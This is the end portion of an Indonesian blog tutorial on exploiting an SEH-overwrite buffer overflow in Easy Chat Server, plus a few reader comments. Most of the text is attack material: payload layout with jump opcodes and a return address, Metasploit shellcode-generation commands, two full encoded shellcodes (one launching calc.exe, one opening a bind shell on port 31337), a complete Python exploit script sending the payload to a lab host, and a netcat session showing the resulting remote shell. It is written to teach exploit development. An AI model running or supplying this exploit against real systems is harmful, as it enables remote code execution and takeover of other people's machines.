Dari list lokasi memory diatas, akan kita pilih satu, yaitu 0x1001b2b6. Jika kita akan kirimkan melalui request maka jangan lupa untuk mengubahnya dalam format little endian, menjadi “xb6xb2x01x10”. Selanjutnya adalah opcode untuk “jump forward 6 byte”. Opcode untuk jump adalah EB, dan opcode untuk 6 byte adalah 06, sehingga opcode yang akan membuat EIP lompat 6 byte kedepan untuk mengeksekusi shellcode adalah  EB 06.

[ "A" * 216 (216 bytes) ] + [ xebx06x90x90 (4 bytes) ] + [ xb6xb2x01x10 (4 bytes) ] + [ shellcode ]

Jika ada yang bertanya “kenapa jump 6 byte kedepan?”, silahkan perhatikan lagi isi buffer diatas. Ketika EIP dibawa menuju Next SEH setelah mengeksekusi “pop, pop, ret” pada SEH, maka EIP harus melompati SEH (4 bytes) dan Low Address dari Next SEH (2 bytes). Opcode EB06 hanya mengambil 2 bytes dari alokasi Next SEH, sehingga sisa 2 bytes nya bisa kita isi dengan NOP (0x90), dan bytes NOP tersebut harus kita lompati juga. Sehingga total bytes yang harus dilompati adalah 4+2 = 6 (what’s this, elementary school math?).

Payload

Junk sudah, Next SEH sudah, SEH sudah, yang terakhir adalah shellcode. Untuk generate shellcode kita bisa menggunakan bantuan metasploit lagi dengan memanfaatkan tools msfencode.

$ ./msfpayload windows/exec CMD="c:windowssystem32calc.exe" R | ./msfencode -e x86/alpha_upper -b "x00" -t c
[*] x86/alpha_upper succeeded with size 511 (iteration=1)

unsigned char buf[] =
"x89xe0xd9xc8xd9x70xf4x5fx57x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4dx38x4bx39x43x30"
"x45x50x43x30x45x30x4dx59x4dx35x46x51x49x42x43"
"x54x4cx4bx46x32x50x30x4cx4bx50x52x44x4cx4cx4b"
"x46x32x45x44x4cx4bx44x32x51x38x44x4fx4ex57x51"
"x5ax46x46x46x51x4bx4fx46x51x49x50x4ex4cx47x4c"
"x43x51x43x4cx45x52x46x4cx51x30x4fx31x48x4fx44"
"x4dx45x51x49x57x4dx32x4cx30x50x52x50x57x4cx4b"
"x50x52x42x30x4cx4bx51x52x47x4cx45x51x4ex30x4c"
"x4bx51x50x42x58x4bx35x4fx30x44x34x50x4ax45x51"
"x48x50x50x50x4cx4bx47x38x45x48x4cx4bx46x38x51"
"x30x43x31x48x53x4dx33x47x4cx51x59x4cx4bx50x34"
"x4cx4bx43x31x49x46x46x51x4bx4fx46x51x49x50x4e"
"x4cx49x51x48x4fx44x4dx45x51x48x47x47x48x4bx50"
"x44x35x4bx44x43x33x43x4dx4cx38x47x4bx43x4dx47"
"x54x44x35x4dx32x51x48x4cx4bx50x58x47x54x43x31"
"x49x43x45x36x4cx4bx44x4cx50x4bx4cx4bx46x38x45"
"x4cx43x31x48x53x4cx4bx45x54x4cx4bx45x51x4ex30"
"x4cx49x50x44x47x54x51x34x51x4bx51x4bx43x51x50"
"x59x50x5ax46x31x4bx4fx4bx50x50x58x51x4fx51x4a"
"x4cx4bx44x52x4ax4bx4bx36x51x4dx42x4ax43x31x4c"
"x4dx4cx45x48x39x45x50x43x30x43x30x46x30x45x38"
"x46x51x4cx4bx42x4fx4cx47x4bx4fx48x55x4fx4bx4a"
"x50x4fx45x4ex42x50x56x42x48x49x36x4dx45x4fx4d"
"x4dx4dx4bx4fx49x45x47x4cx43x36x43x4cx45x5ax4b"
"x30x4bx4bx4bx50x44x35x44x45x4fx4bx51x57x44x53"
"x43x42x42x4fx42x4ax43x30x50x53x4bx4fx49x45x42"
"x43x47x4ax51x4cx43x47x42x49x42x4ex42x44x42x4f"
"x44x37x42x53x51x4cx44x33x43x49x42x53x44x34x45"
"x35x42x4dx50x33x50x32x51x4cx43x53x43x51x42x4c"
"x42x43x46x4ex45x35x44x38x45x35x43x30x45x5ax41"
"x41";

Show Ur Spl0it

Pada awal tulisan ini saya berjanji akan seminimal mungkin menggunakan programming, namun untuk mengirimkan shellcode harus menggunakan bantuan programming. Alasannya karena jika menggunakan telnet maka karakter-karakter shellcode tersebut akan berubah isinya ketika sampai pada easy chat server. Kita akan menggunakan bahasa pemrograman python yang mendefinisikan variabel junk, next seh, seh, serta shellcode. Socket akan membuka koneksi ke port 80 server, dan mengirimkan request yang berisi variabel-variabel tersebut ke server dan akan meng-eksploitasi authentifikasi variable ‘username’.

#!/usr/bin/python

import struct
import socket

junk = "A" * 216
next_seh = "xebx06x90x90"
seh = "xb6xb2x01x10"
shellcode = (
"x89xe0xd9xc8xd9x70xf4x5fx57x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4dx38x4bx39x43x30"
"x45x50x43x30x45x30x4dx59x4dx35x46x51x49x42x43"
"x54x4cx4bx46x32x50x30x4cx4bx50x52x44x4cx4cx4b"
"x46x32x45x44x4cx4bx44x32x51x38x44x4fx4ex57x51"
"x5ax46x46x46x51x4bx4fx46x51x49x50x4ex4cx47x4c"
"x43x51x43x4cx45x52x46x4cx51x30x4fx31x48x4fx44"
"x4dx45x51x49x57x4dx32x4cx30x50x52x50x57x4cx4b"
"x50x52x42x30x4cx4bx51x52x47x4cx45x51x4ex30x4c"
"x4bx51x50x42x58x4bx35x4fx30x44x34x50x4ax45x51"
"x48x50x50x50x4cx4bx47x38x45x48x4cx4bx46x38x51"
"x30x43x31x48x53x4dx33x47x4cx51x59x4cx4bx50x34"
"x4cx4bx43x31x49x46x46x51x4bx4fx46x51x49x50x4e"
"x4cx49x51x48x4fx44x4dx45x51x48x47x47x48x4bx50"
"x44x35x4bx44x43x33x43x4dx4cx38x47x4bx43x4dx47"
"x54x44x35x4dx32x51x48x4cx4bx50x58x47x54x43x31"
"x49x43x45x36x4cx4bx44x4cx50x4bx4cx4bx46x38x45"
"x4cx43x31x48x53x4cx4bx45x54x4cx4bx45x51x4ex30"
"x4cx49x50x44x47x54x51x34x51x4bx51x4bx43x51x50"
"x59x50x5ax46x31x4bx4fx4bx50x50x58x51x4fx51x4a"
"x4cx4bx44x52x4ax4bx4bx36x51x4dx42x4ax43x31x4c"
"x4dx4cx45x48x39x45x50x43x30x43x30x46x30x45x38"
"x46x51x4cx4bx42x4fx4cx47x4bx4fx48x55x4fx4bx4a"
"x50x4fx45x4ex42x50x56x42x48x49x36x4dx45x4fx4d"
"x4dx4dx4bx4fx49x45x47x4cx43x36x43x4cx45x5ax4b"
"x30x4bx4bx4bx50x44x35x44x45x4fx4bx51x57x44x53"
"x43x42x42x4fx42x4ax43x30x50x53x4bx4fx49x45x42"
"x43x47x4ax51x4cx43x47x42x49x42x4ex42x44x42x4f"
"x44x37x42x53x51x4cx44x33x43x49x42x53x44x34x45"
"x35x42x4dx50x33x50x32x51x4cx43x53x43x51x42x4c"
"x42x43x46x4ex45x35x44x38x45x35x43x30x45x5ax41"
"x41")

request  = "GET /chat.ghp?username=" + junk + next_seh + seh + shellcode + "&password=1234567&room=1&sex=2 HTTP/1.1rn"
request += "Host: 172.16.30.129rn"

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(('172.16.30.129',80))
sock.send(request + "rnrn")
sock.close()

Hasilnya adalah aplikasi Easy Chat Server akan di-terminate dan akan keluar calc.exe,

Wait, where’s my shell?

Eksekusi calc.exe diatas biasanya tipikal shellcode standar untuk membuktikan bahwa alur eksploitasi kita berjalan dengan baik. Untuk mendapatkan shell pada server yang telah di eksploitasi cukup menggangi shellcodenya saja,

$ ./msfpayload windows/shell_bind_tcp LPORT=31337 R | ./msfencode -e x86/alpha_upper -b "x00" -t c
[*] x86/alpha_upper succeeded with size 753 (iteration=1)

unsigned char buf[] =
"x89xe3xdbxd7xd9x73xf4x5bx53x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4dx59x43x30"
"x43x30x45x50x45x30x4bx39x4dx35x50x31x48x52x45"
"x34x4cx4bx51x42x46x50x4cx4bx50x52x44x4cx4cx4b"
"x46x32x42x34x4cx4bx44x32x47x58x44x4fx4ex57x51"
"x5ax51x36x46x51x4bx4fx46x51x4fx30x4ex4cx47x4c"
"x45x31x43x4cx44x42x46x4cx51x30x4fx31x48x4fx44"
"x4dx45x51x4fx37x4ax42x4cx30x51x42x51x47x4cx4b"
"x46x32x42x30x4cx4bx51x52x47x4cx45x51x48x50x4c"
"x4bx51x50x44x38x4dx55x49x50x43x44x50x4ax45x51"
"x4ex30x50x50x4cx4bx51x58x45x48x4cx4bx51x48x47"
"x50x43x31x48x53x4ax43x47x4cx50x49x4cx4bx47x44"
"x4cx4bx45x51x48x56x46x51x4bx4fx46x51x49x50x4e"
"x4cx4fx31x48x4fx44x4dx45x51x49x57x50x38x4dx30"
"x44x35x4ax54x44x43x43x4dx4cx38x47x4bx43x4dx46"
"x44x43x45x4dx32x51x48x4cx4bx50x58x51x34x43x31"
"x4ex33x45x36x4cx4bx44x4cx50x4bx4cx4bx46x38x45"
"x4cx43x31x49x43x4cx4bx43x34x4cx4bx45x51x4ex30"
"x4cx49x50x44x47x54x46x44x51x4bx51x4bx45x31x51"
"x49x51x4ax46x31x4bx4fx4dx30x50x58x51x4fx51x4a"
"x4cx4bx42x32x4ax4bx4cx46x51x4dx45x38x50x33x47"
"x42x45x50x45x50x45x38x42x57x42x53x47x42x51x4f"
"x51x44x45x38x50x4cx44x37x51x36x43x37x4bx4fx49"
"x45x4ex58x4cx50x43x31x43x30x45x50x47x59x48x44"
"x51x44x46x30x42x48x47x59x4bx30x42x4bx43x30x4b"
"x4fx49x45x46x30x46x30x50x50x46x30x51x50x50x50"
"x51x50x46x30x42x48x4ax4ax44x4fx49x4fx4dx30x4b"
"x4fx48x55x4cx49x4fx37x46x51x49x4bx50x53x42x48"
"x45x52x45x50x42x5ax43x59x4dx59x4bx56x42x4ax44"
"x50x51x46x51x47x43x58x4fx32x49x4bx46x57x43x57"
"x4bx4fx4ex35x51x43x50x57x43x58x48x37x4ax49x46"
"x58x4bx4fx4bx4fx48x55x50x53x46x33x51x47x42x48"
"x42x54x4ax4cx47x4bx4dx31x4bx4fx4ex35x50x57x4d"
"x59x49x57x42x48x42x55x42x4ex50x4dx43x51x4bx4f"
"x49x45x43x58x45x33x42x4dx43x54x43x30x4cx49x4a"
"x43x51x47x46x37x50x57x46x51x4bx46x42x4ax44x52"
"x50x59x50x56x4bx52x4bx4dx45x36x49x57x50x44x47"
"x54x47x4cx45x51x45x51x4cx4dx51x54x46x44x42x30"
"x4fx36x45x50x51x54x46x34x50x50x51x46x46x36x50"
"x56x47x36x46x36x50x4ex51x46x46x36x50x53x50x56"
"x45x38x44x39x48x4cx47x4fx4cx46x4bx4fx48x55x4b"
"x39x4bx50x50x4ex50x56x47x36x4bx4fx46x50x43x58"
"x45x58x4bx37x45x4dx43x50x4bx4fx48x55x4fx4bx4c"
"x30x48x35x4ex42x51x46x45x38x4fx56x4cx55x4fx4d"
"x4dx4dx4bx4fx4ex35x47x4cx43x36x43x4cx45x5ax4b"
"x30x4bx4bx4dx30x43x45x43x35x4fx4bx50x47x42x33"
"x42x52x42x4fx43x5ax43x30x46x33x4bx4fx4ex35x45"
"x5ax41x41";

Dengan mengganti bagian shellcode dari spl0it diatas, maka ketika selesai dieksekusi sistem operasi target akan membuka shell di port 31337,

$ nc 172.16.30.129 31337
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and SettingsStrazytskiDesktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8C23-6511

 Directory of C:Documents and SettingsStrazytskiDesktop

01/29/2010  11:14 AM              .
01/29/2010  11:14 AM              ..
01/28/2010  07:37 PM         2,359,739 camshot-v1.2.exe
01/29/2010  07:28 AM               670 Easy Chat Server.lnk
01/26/2010  04:47 PM               575 IDA Pro Advanced (32-bit).lnk
01/26/2010  04:47 PM               587 IDA Pro Advanced (64-bit).lnk
01/26/2010  01:30 PM        91,799,890 IDAPro5.5.rar
04/22/2009  01:36 PM             1,059 Microsoft Visual Studio 2008.lnk
04/26/2009  06:36 PM               666 OLLYDBG.lnk
01/18/2010  11:39 PM              vuln software
01/09/2010  06:56 PM               494 windbg.lnk
               8 File(s)     94,163,680 bytes
               3 Dir(s)  22,697,357,312 bytes free

Well, that’s all for now folks. Banyak sekali contoh aplikasi yang dapat di eksploitasi menggunakan tehnik SEH overwrite. Setelah berlatih dengan 4-5 software, kalian pasti bisa dengan mudah mendapatkan konsep dan menerapkannya pada bug software lain.

Have fun with your pop+pop+ret :).

Post a Comment

4 Responses to “SEH Overwrite for n00b”

  1. Peter Van Eeckhoutte says:
    February 7, 2010 at 3:17 pm

    That’s a really good tutorial !

    quick tip : instead of running !pvefindaddr findmsp, you can also run !pvefindaddr suggest (which will run findmsp first, will then analyze the results & show how possible exploit code would look like)

    Latest version of pvefindaddr can be downloaded from http://www.corelan.be:8800/index.php/security/pvefindaddr-py-immunity-debugger-pycommand/

    Reply
  2. Peter Van Eeckhoutte says:
    February 7, 2010 at 3:33 pm

    by the way : you can also create a metasploit pattern in Immunity :
    example : !pvefindaddr pattern_create 750

    All output generated by !pvefindaddr functions are written to files too… when creating a metasploit pattern, the output is written to mspattern.txt (in the Immunity Debugger program folder)

    Reply
  3. byteskrew says:
    February 7, 2010 at 11:01 pm

    hi peter, glad you visit our blog, thx for suggestion regarding pvefindaddr :). i just realize about new pvefindaddr some time ago, I use old version which downloaded after our last emails for writing this article.

    ~ cyberheb

    Reply
  4. gunslinger_ says:
    July 21, 2010 at 11:20 am

    wow this is cool, thx for sharing…
    peter here’s too very nice 😉

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *